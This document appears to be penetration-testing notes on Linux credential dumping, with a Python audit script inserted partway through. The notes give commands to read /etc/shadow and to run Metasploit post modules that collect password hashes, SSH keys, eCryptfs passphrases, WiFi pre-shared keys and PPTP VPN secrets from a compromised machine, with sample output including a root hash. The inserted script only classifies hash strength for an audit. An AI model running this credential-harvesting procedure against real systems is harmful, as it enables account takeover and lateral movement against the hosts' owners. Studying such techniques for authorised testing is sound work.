Linux Hash Dumping
#Hash Dumping Using /etc/shadow
cat /etc/shadow

📌 root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.
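The `$6$` prefix in the entry above is the crypt(3) scheme identifier (SHA-512 crypt), followed by the salt and the hash. The following audit helper is an added example, not part of the original notes: it classifies shadow-style lines by scheme so weak, empty or locked entries stand out on a host you administer. The names `classify`, `audit` and `Finding` and the weak/ok labelling are assumptions made for this example.

```python
from typing import NamedTuple, Optional

# crypt(3) "$id$" prefixes; the bool marks schemes this audit treats as weak.
SCHEMES = {
    "1": ("md5crypt", True),
    "5": ("sha256crypt", False), "6": ("sha512crypt", False),
    "2a": ("bcrypt", False), "2b": ("bcrypt", False), "2y": ("bcrypt", False),
    "y": ("yescrypt", False),
}

class Finding(NamedTuple):
    user: str
    scheme: str
    status: str            # ok | weak | locked | empty | review
    rounds: Optional[int]  # explicit rounds=N (sha256crypt/sha512crypt), else None

def classify(line: str) -> Finding:
    """Accepts /etc/shadow lines and unshadowed user:hash:uid:... lines."""
    user, _, rest = line.strip().partition(":")
    field = rest.split(":", 1)[0]
    if field == "":
        return Finding(user, "none", "empty", None)    # no password required
    if field[0] in "!*":
        return Finding(user, "none", "locked", None)   # password login disabled
    if not field.startswith("$"):                      # no $id$ prefix
        des = len(field) == 13                         # traditional DES crypt is 13 chars
        return Finding(user, "descrypt" if des else "unknown", "weak" if des else "review", None)
    parts = field.split("$")                           # ['', id, (rounds=N,) salt, hash]
    name, weak = SCHEMES.get(parts[1], ("unknown", None))
    rounds = None
    if len(parts) > 2 and parts[2].startswith("rounds="):
        value = parts[2][len("rounds="):]
        rounds = int(value) if value.isdigit() else None
    status = "review" if weak is None else ("weak" if weak else "ok")
    return Finding(user, name, status, rounds)

def audit(text: str) -> list:
    return [classify(l) for l in text.splitlines() if ":" in l and not l.startswith("#")]

# First line is the root entry shown on this page; the others are constructed samples.
SAMPLE = """\
root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:0:0:root:/root:/bin/bash
legacy:$1$CONSTRUCTED$notarealhashvalue00000:19000:0:99999:7:::
svc:$6$rounds=10000$CONSTRUCTED$notarealhashvalue:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
guest::19000:0:99999:7:::
"""

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f.user:8} {f.scheme:12} {f.status:7} rounds={f.rounds}")
```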
Gather Linux Password hashes with Metasploit
#Metasploit
# background the session with CTRL+Z
search hashdump
use post/linux/gather/hashdump
set SESSION 2
run
[+] root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:0:0:root:/root:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20230323100234_default_192.75.64.3_linux.hashes_660271.txt
The unshadowed password file contains the hashed passwords in a format that is ready to be cracked.
#Some Post Exploitation
Enumerate ssh directories
search ssh_creds
use post/multi/gather/ssh_creds
info
# Description:
# This module will collect the contents of all users' .ssh directories
# on the targeted machine. Additionally, known_hosts and
# authorized_keys and any other files are also downloaded. This module
# is largely based on firefox_creds.rb.
sessions
# Set the Meterpreter session
set SESSION 2
run

Enumerate users' .ecrypts directories
search ecryptfs_creds
use post/linux/gather/ecryptfs_creds
info
# Description:
# This module will collect the contents of all users' .ecrypts
# directories on the targeted machine. Collected "wrapped-passphrase"
# files can be cracked with John the Ripper (JtR) to recover "mount
# passphrases".
sessions
set SESSION 2
run

Enumerate WiFi credentials
search enum_psk
use post/linux/gather/enum_psk
info
# Description:
# This module collects 802-11-Wireless-Security credentials such as
# Access-Point name and Pre-Shared-Key from your target CLIENT Linux
# machine using /etc/NetworkManager/system-connections/ files. The
# module gathers NetworkManager's plaintext "psk" information.
set SESSION 2
run

Check for PPTP VPN chap-secrets credentials
search pptpd_chap_secrets
use post/linux/gather/pptpd_chap_secrets
info
# Description:
# This module collects PPTP VPN information such as client, server,
# password, and IP from your target server's chap-secrets file.
set SESSION 2
run
